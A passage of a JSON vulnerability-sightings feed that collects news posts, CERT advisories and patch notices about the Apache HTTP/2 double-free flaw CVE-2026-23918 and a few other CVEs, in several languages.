\u0434\u043b\u044f CVE-2026-41635, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0443\u044e \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0441\u043f\u0438\u0441\u043a\u0430 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n3. VulnCheck \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e CVE-2026-29014\u00a0(CVSS: 9,8) \u0432 CMS \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c MetInfo.\n\n\u041e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 MetInfo CMS 7.9, 8.0 \u0438 8.1 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0441\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c PHP-\u043a\u043e\u0434\u043e\u043c.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0443\u044e \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0434\u043b\u044f RCE \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u043d\u0430\u0434 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.", "creation_timestamp": "2026-05-06T18:50:06.000000Z"}, {"uuid": "3f8a04c5-2e7d-4966-a393-5fdbb77a2e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/apache-http-server-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T18:00:00.000000Z"}, {"uuid": "f0efb4ea-29b0-43aa-b6c9-0ef575ea4bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/bdufstecru/3136", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 HTTP/2 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 Apache HTTP Server \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438\u043b\u0438 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438\n\nBDU:2026-06305\nCVE-2026-23918\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\nhttps://httpd.apache.org/security/vulnerabilities_24.html\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0442\u043a\u043e\u043b\u0430 HTTP/2 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0442\u0440\u043e\u043a\u0438 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435 (httpd.conf) \u0438\u043b\u0438 \u0432\u043e \u0432\u0445\u043e\u0434\u044f\u0449\u0435\u043c \u0432 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435.", "creation_timestamp": "2026-05-06T15:27:47.000000Z"}, {"uuid": "fca19aa0-e42f-4549-b3e0-8bbd38d5f689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://www.cert.se/2026/05/allvarlig-sarbarhet-i-apache.html", "content": "", "creation_timestamp": "2026-05-06T06:55:00.000000Z"}, {"uuid": "e24b599d-e23d-420a-a6ca-ee39833b346d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/ehcgroup.bsky.social/post/3ml77eelrlk2a", "content": "Vulnerabilidad cr\u00edtica en Apache expone a millones de servidores a ataques RCE.\n\nSe ha parchado una vulnerabilidad grave (CVE-2026-23918) que permite la Ejecuci\u00f3n Remota de C\u00f3digo (RCE) aprovechando un fallo en HTTP/2. #ciberseguridad #cybersecurity\nwww.linkedin.com/pulse/vulner...", "creation_timestamp": "2026-05-06T17:17:00.872389Z"}, {"uuid": "7f88cde8-9ab7-4fe5-a4d9-2c7c1ea08589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-multiple-vulnerabilities-apache-http-server-can-lead-remote-code-execution-patch", "content": "", "creation_timestamp": "2026-05-06T09:37:53.000000Z"}, {"uuid": "15b37892-eb96-45ed-90cf-cb7b00d3c629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3ml7bvy6m6s2g", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE\n\nThe Apache Software Foundation (ASF) has released security updates to address several security vulnerabilities in the HTTP Server, including a severe vulnerability that could potentially lead to remote cod\u2026\n#hackernews #news", "creation_timestamp": "2026-05-06T18:02:35.537468Z"}, {"uuid": "b33abab4-d3dd-4661-9091-cc723a683677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mlaly7awvcv7", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html", "creation_timestamp": "2026-05-07T06:35:27.568024Z"}, {"uuid": "8e3183f3-a9d4-4491-a4a5-b3752a118070", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/TengkorakCyberCrewzz/10165", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE \u2013 thehackernews.com\n\nWed, 06 May 2026 00:19:00", "creation_timestamp": "2026-05-05T20:03:10.000000Z"}, {"uuid": "0221a14a-1d08-45ba-be83-bd586c2aac6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3ml56hjuczm2j", "content": "Apache HTTP Server 2.4.67 cierra 11 vulnerabilidades de mayo: el RCE en HTTP/2 ([CVE-2026-23918](https://nvd.nist.gov/vuln/detail/CVE-2026-23918)) que obliga a parchear hoy\n\n\nhttps://elsolitario.org/2026/05/05/apache-http-server-2-4-67-cierra-11-vulnerabilidades-de-mayo-el-rce-en-http-2-cv/?utm_s...", "creation_timestamp": "2026-05-05T21:55:30.243263Z"}, {"uuid": "a1e67579-b9e7-4fa4-b744-1fd801b9c59a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3ml56kfmcd72x", "content": "Apache HTTP Server 2.4.67 cierra 11 vulnerabilidades de mayo: el RCE en HTTP/2 (CVE-2026-23918) que obliga a parchear hoy\n\n\nhttps://elsolitario.org/2026/05/05/apache-http-server-2-4-67-cierra-11-vulnerabilidades-de-mayo-el-rce-en-http-2-cv/?utm_source=bluesky&utm_medium=social&utm_campaign=progra...", "creation_timestamp": "2026-05-05T21:57:05.821137Z"}, {"uuid": "9676aa14-5cff-40e7-9621-8918fffac3f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/thehackernews/8941", "content": "\ud83d\udea8 Apache patches CVE-2026-23918 (CVSS 8.8) in HTTP Server 2.4.66.\n\nThe HTTP/2 double-free flaw can trigger DoS and potentially enable remote code execution via crafted requests. Fixed in 2.4.67.\n\nDetails here: https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html", "creation_timestamp": "2026-05-05T16:26:43.000000Z"}, {"uuid": "9fca98cd-0ded-44de-858a-fbab5de3dba8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/DJPRMF.mastodon.social.ap.brid.gy/post/3ml5bypqufhm2", "content": "Est\u00e1 a ser uns dias complicados para muitos... \ud83e\udee0\n\nhttps://support.cpanel.net/hc/en-us/articles/40229402602519-Security-CVE-2026-23918", "creation_timestamp": "2026-05-05T22:58:49.007494Z"}, {"uuid": "20716d79-855c-4c97-8443-fc43c61ed398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3ml5nsllfhs2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 561 interactions\nCVE-2026-41940: 122 interactions\nCVE-2026-3854: 42 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-41940: 40 interactions\nCVE-2026-31431: 21 interactions\nCVE-2026-23918: 12 interactions\n", "creation_timestamp": "2026-05-06T02:30:17.202506Z"}, {"uuid": "eb3266d6-8357-42e3-a84b-a97153309f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116527208469343364", "content": "#Debian stable #apache2 package 2.4.66-1~deb13u2 already includes the fix for CVE-2026-23918.\nYou an verify this by apt-source apache2and then checking out apache2-2.4.66/debian/patches/bug1125368.patch\nThe security tracker at https://security-tracker.debian.org/tracker/CVE-2026-23918 currently has wrong information. This is likely due to automation based on version numbers alone.\n#CVE_2026_23918", "creation_timestamp": "2026-05-06T10:41:35.024766Z"}, {"uuid": "23f16af1-56a3-4717-8d95-85e2b18bfa78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/it-connect.bsky.social/post/3ml6m25ln7m2l", "content": "\u26a0\ufe0f  Faille de s\u00e9curit\u00e9 Apache2\n\nUne nouvelle vuln\u00e9rabilit\u00e9 importante, identifi\u00e9e sous la r\u00e9f\u00e9rence CVE-2026-23918, a \u00e9t\u00e9 patch\u00e9e dans la derni\u00e8re version d'Apache2.\n\nPlus d'infos par ici \ud83d\udd3d \n- www.it-connect.fr/faille-apach...\n\n#apache #linux #webserver #infosec", "creation_timestamp": "2026-05-06T11:31:14.740938Z"}, {"uuid": "bc1363ca-ac5b-4311-9a77-6a0ef0b48d4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3ml6nhmzv4m2x", "content": "Apache HTTP Server Fix Release for Critical HTTP/2 Double-Free Vulnerability CVE-2026-23918 +\u00a0Video\n\nIntroduction A critical security flaw has been identified and patched in the Apache HTTP Server, one of the most widely used web server platforms in the world. The vulnerability, tracked as\u2026", "creation_timestamp": "2026-05-06T11:56:39.551655Z"}, {"uuid": "807bdc1f-0f55-44b0-85fb-eff8b076ae4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/Xvu4gDVXcxvV1IVouigrSoHUInOyP30DE259UYWqVgND-YrA", "content": "", "creation_timestamp": "2026-05-06T11:20:05.000000Z"}, {"uuid": "23591acb-2c93-46ea-a4f3-4e848a6fa011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/GithubRedTeam/83049", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a -CVE-2026-23918\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a seguridadentrerios\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 10:59:52\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n Apache HTTP Server http2\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T11:00:05.000000Z"}, {"uuid": "ac03892e-2eb6-45b4-84c4-7645de32d2ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/ctinow/249822", "content": "Apache fixes critical HTTP/2 double-free flaw CVE-2026-23918 enabling RCE\nhttps://ift.tt/UFkn06G", "creation_timestamp": "2026-05-06T11:09:03.000000Z"}, {"uuid": "0c8b9e6a-2213-49a7-ab06-68941dc06418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/ninjaowl.ai/post/3ml6ojqdvsl2x", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE #cybersecurity #hacking #news #infosec #security #technology #privacy thehackernews.com/20...", "creation_timestamp": "2026-05-06T12:15:43.959368Z"}, {"uuid": "79270e53-b9f7-450b-8e69-021a5d2abc5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/tychotithonus.infosec.exchange.ap.brid.gy/post/3ml6paounyt72", "content": "@Andres4NY Parent post updated, apparently CVE-2026-23918 was fixed much earlier?", "creation_timestamp": "2026-05-06T12:32:34.821340Z"}, {"uuid": "c27d670b-d537-4ce4-85e6-9f3db63449ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/9fU2vzKMa2gcn-wKAyzn4AxPbX3PdbIrb-3vvNDymdxAcQ", "content": "", "creation_timestamp": "2026-05-05T17:14:44.000000Z"}, {"uuid": "51c5b0df-c039-490c-95bd-7fc7a819c6d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://mastodon.social/ap/users/115426718704364579/statuses/116527808438415469", "content": "\ud83d\udcf0 Critical RCE Flaw in Apache HTTP Server's HTTP/2 Module Patched\n\ud83d\udea8 CRITICAL APACHE FLAW: A double-free bug (CVE-2026-23918) in Apache HTTP Server's http2 module allows for DoS and potential RCE. A PoC exploit exists. Upgrade to version 2.4.67 immediately! #Apache #CyberSecurity #Vulnerability #RCE\n\ud83d\udd17 https://cyber.netsecops.io", "creation_timestamp": "2026-05-06T13:14:09.984538Z"}, {"uuid": "a5a0efcf-d068-4aa9-a6f0-b0b6b67f14a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/netsecio.bsky.social/post/3ml6rsyjmiu2e", "content": "\ud83d\udea8 CRITICAL APACHE FLAW: A double-free bug (CVE-2026-23918) in Apache HTTP Server's http2 module allows for DoS and potential RCE. A PoC exploit exists. Upgrade to version 2.4.67 immediately! #Apache #CyberSecurity #Vulnerability #RCE", "creation_timestamp": "2026-05-06T13:14:36.342561Z"}, {"uuid": "46df45e6-85d8-4e12-b41b-58a26ed1468e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/modat-io.bsky.social/post/3ml6t6tdfu22z", "content": "\u26a0\ufe0f CVE-2026-23918: Double free in Apache HTTP Server 2.4.66 HTTP/2 may allow unauth RCE via crafted requests, risking full server compromise. Update to 2.4.67 or disable HTTP/2/restrict access. Query: web.headers=\"Server: Apache/2.4.66\"\u00a0\n\nThe platform: magnify.modat.io", "creation_timestamp": "2026-05-06T13:39:13.238213Z"}, {"uuid": "bbe8bb5b-c6e5-4282-a8c5-9ac03b747b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml6vqyt6472y", "content": "Critical #Apache HTTP/2 flaw (CVE-2026-23918) enables DoS and potential RCE. Update to version 2.4.67 immediately to secure your servers. #CyberSecurity #Vulnerability #HTTP2 Link: thedailytechfeed.com/critical-apa...", "creation_timestamp": "2026-05-06T14:25:05.328348Z"}, {"uuid": "da55729c-4d31-4689-8c0c-975b8469ea4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/cwealthsentinel.bsky.social/post/3mlb6j5kye22j", "content": "Apache fixes critical HTTP/2 double-free flaw CVE-2026-23918 enabling RCE", "creation_timestamp": "2026-05-07T12:07:03.744782Z"}, {"uuid": "073b5996-402c-4a97-a7e0-cadba141460c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mlbb6i2re5w2", "content": "Critical apache CVE-2026-23918 - AIO impacted? ernolf: By the way, Ubuntu users with bare-metal installations will not be offered the new version. Most of the time these are backported by the distr...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-07T12:54:50.660933Z"}, {"uuid": "8ad31108-75ad-493d-b1cb-10ddc8fbb328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/bettycjung.bsky.social/post/3ml7ijbnjfk2l", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE  thehackernews.com/2026/05/crit...", "creation_timestamp": "2026-05-06T20:00:49.270428Z"}, {"uuid": "8093f10e-7021-4f45-ae47-48a4b290e9ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3ml7zizeyls2g", "content": "Apache HTTP/2\u306e\u91cd\u5927\u306a\u8106\u5f31\u6027\uff08CVE-2026-23918\uff09\u306b\u3088\u308a\u3001DoS\u653b\u6483\u304a\u3088\u3073\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306e\u53ef\u80fd\u6027\u304c\u751f\u3058\u308b \n\nApache HTTP/2\u306e\u91cd\u5927\u306a\u8106\u5f31\u6027\uff08CVE-2026-23918\uff09\u306b\u3088\u308a\u3001DoS\u653b\u6483\u304a\u3088\u3073\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306e\u53ef\u80fd\u6027\u304c\u751f\u3058\u308b  #HackerNews (May 5)\n\nthehackernews.com/2026/05/crit...", "creation_timestamp": "2026-05-07T01:04:50.529798Z"}, {"uuid": "3ef101a1-21db-4960-b8c6-8cd2b25ca945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-2391", "type": "seen", "source": "https://bsky.app/profile/yourdailytechnews.bsky.social/post/3mlaxh7twyk23", "content": "CyberWireDaily: Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE\nApache Software Foundation patched CVE-2026-23918, a critical HTTP/2 vulnerability scoring 8.8 on the CVSS scale. The\u2026\n\nhttps://cyberwiredaily.net/article/2026-05-06-critical-apache-http2-flaw-cve-2026-2391", "creation_timestamp": "2026-05-07T10:00:42.353903Z"}, {"uuid": "fe7e5b60-7be2-41dd-b719-8657daebd9e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mla6bbmmbf2m", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 516 interactions\nCVE-2026-41940: 123 interactions\nCVE-2025-31431: 29 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0300: 19 interactions\nCVE-2026-31431: 8 interactions\nCVE-2026-23918: 5 interactions\n", "creation_timestamp": "2026-05-07T02:29:59.814947Z"}, {"uuid": "863415d8-67fe-404f-b847-6b371eb4fc16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/yourdailytechnews.bsky.social/post/3mlaxh7twyk23", "content": "CyberWireDaily: Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE\nApache Software Foundation patched CVE-2026-23918, a critical HTTP/2 vulnerability scoring 8.8 on the CVSS scale. The\u2026\n\nhttps://cyberwiredaily.net/article/2026-05-06-critical-apache-http2-flaw-cve-2026-2391", "creation_timestamp": "2026-05-07T10:00:42.109730Z"}, {"uuid": "4d1dbf9b-a2cd-4fb8-a29b-4dfb308a5123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlaxkc43xy2j", "content": "\ud83d\udd12 For a Fistful of Dollars: CVE-2026-23918 \u2013 Pre-auth RCE in Apache httpd\n\nCVE-2026-23918, a pre-authentication Remote Code Execution (RCE) vulnerability, has been found in Apache httpd's m...\n\nhttps://is.gd/484fq4 #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-07T10:02:24.982477Z"}, {"uuid": "b813da3c-f1a5-4316-8133-89ab5ee526e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlgfyeuths2y", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own in 40 minutes. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/cve-2026-239...", "creation_timestamp": 